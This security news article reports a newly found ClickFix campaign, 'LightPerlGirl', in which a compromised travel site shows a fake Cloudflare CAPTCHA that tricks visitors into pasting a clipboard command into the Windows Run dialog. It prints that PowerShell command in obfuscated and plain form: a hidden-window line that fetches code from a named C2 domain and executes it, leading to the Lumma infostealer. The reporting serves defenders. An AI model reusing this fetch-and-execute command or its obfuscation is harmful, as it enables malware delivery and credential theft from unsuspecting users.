Researchers have discovered a novel ClickFix variant, named LightPerlGirl.
ClickFix uses social engineering to trick users into loading LOLBINS malware on their own devices, in this case using PowerShell. With evasion built into the ClickFix code and PowerShell execution undertaken in memory, the presence of ClickFix malware is easily missed.
On June 13, 2025, researchers at Todyl, a networking and security platform for MSPs, detected a ClickFix variant that has not previously been seen. It was found on a compromised WordPress travel site being used in a traditional waterholing attack.
Visitors to the site seeking a holiday in the Galapagos would receive a pop-up dialog box purporting to be part of Cloudflare’s CAPTCHA security process. The social engineering process is not new, being similar to that used in the variant discussed by SlashNext in early June.
Both attacks aim to persuade the user that similar additional steps are required to complete Cloudflare’s Turnstile CAPTCHA process. In this new example, a banner at the bottom of the box claims ‘Performance & Security by Cloudflare’.
The visitor is required to press ‘Windows + R’ followed by ‘CTRL + V’ followed by ‘OK’. By this time the compromised website has already loaded the first PowerShell command into the user’s clipboard. The Run dialog box is opened, ClickFix is pasted into it, and the code is executed.
The first command is heavily obfuscated, so even if briefly seen by the visitor, it will probably be unrecognizable. The obfuscated command is seen by a human as:
“C:\WINDOWS\system32\WindowsPowerShell\v1.0\PowerShell.exe” –nOp –w h –C “$rb”l”d30 = ‘cmb”k”z”8kz1″0″0″01″0″8k2″ca”rj”ew”z”f.inf”o’; $v”nr”l”01″ = Invo”k”e”- “RestM”e”th”o”d -Uri $rb”l”d”3″0; I”nvo”k”e-E”xp”ress”i”o”n $v”n”r”l0″1”
But it is seen and interpreted by the computer as:
“C:\WINDOWS\system32\WindowsPowerShell\v1.0\PowerShell.exe” –nOp –w h –C $rbld30 = ‘cmbkz8kz1000108k2carjewzf.info’;
$vnrl01 = Invoke-RestMethod -Uri $rbld30; Invoke-Expression $vnrl01
This command uses PowerShell’s invoke-RestMethod to link to a separate C2 domain (cmbkz8kz1000108k2carjewzf[.]info). The response from the C2 will then be executed by PowerShell’s Invoke-Expression.
Todyl’s researchers found and executed this ClickFix. They discovered that the ultimate malware payload delivered is the Lumma infostealer – but they have many unanswered questions. For example, is the Russia-based source of Lumma (known as ’Shamel’) also the source of this ClickFix; is a separate developer of this ClickFix using Lumma as a service; or are both ends of the equation affiliates of different as- a-service sources? How widespread is this variant? What is the criminal infrastructure?
Todyl will continue to research LightPerlGirl. (The name comes from a surprising copyright notice within the ClickFix code: “(Copyright (c) LightPerlGirl 2025)”.) “We believe it is a brand new and novel campaign,” David Langlands, Todyl’s CSO, told SecurityWeek. His wider research into the extent of LightPerlGirl’s use and the infrastructure it uses will take a while — but since the malware is already in the wild, he decided to publish details of the current code immediately, complete with known IOCs.
Malicious use of PowerShell can be detected by the latest security tools, but ClickFix attempts to avoid them. The wateringhole attack method, which can be supported by malvertising, is not a finely targeted attack. The adversaries have no control over who may visit the site and become infected. However, the use of a compromised travel site would be attractive to individuals sufficiently wealthy to seek an expensive vacation (the Galapagos), and they would likely do so from home on their own PC. Such devices are not often protected by modern EDR – so the ClickFix use of LOLBINS would pass unseen.
The result would be a well-off individual, possibly a company executive, unknowingly infected by an infostealer which could subsequently and potentially learn from the personal computer how to access the employer’s enterprise network. This is the real danger of ClickFix: the compromise of individual employees ultimately leading to the compromise of major employer enterprises.
Todyl only found this new ClickFix variant because one of its corporate customers happened to visit the infected website. An attack that normally avoids exposure to modern detection systems, was discovered almost accidentally.
Related: Russia-Linked APT Star Blizzard Uses ClickFix to Deploy New LostKeys Malware, Google Warns
Related: Lazarus Uses ClickFix Tactics in Fake Cryptocurrency Job Attacks
Related: ClickFix Widely Adopted by Cybercriminals, APT Groups
Related: Microsoft Warns of Hospitality Sector Attacks Involving ClickFix
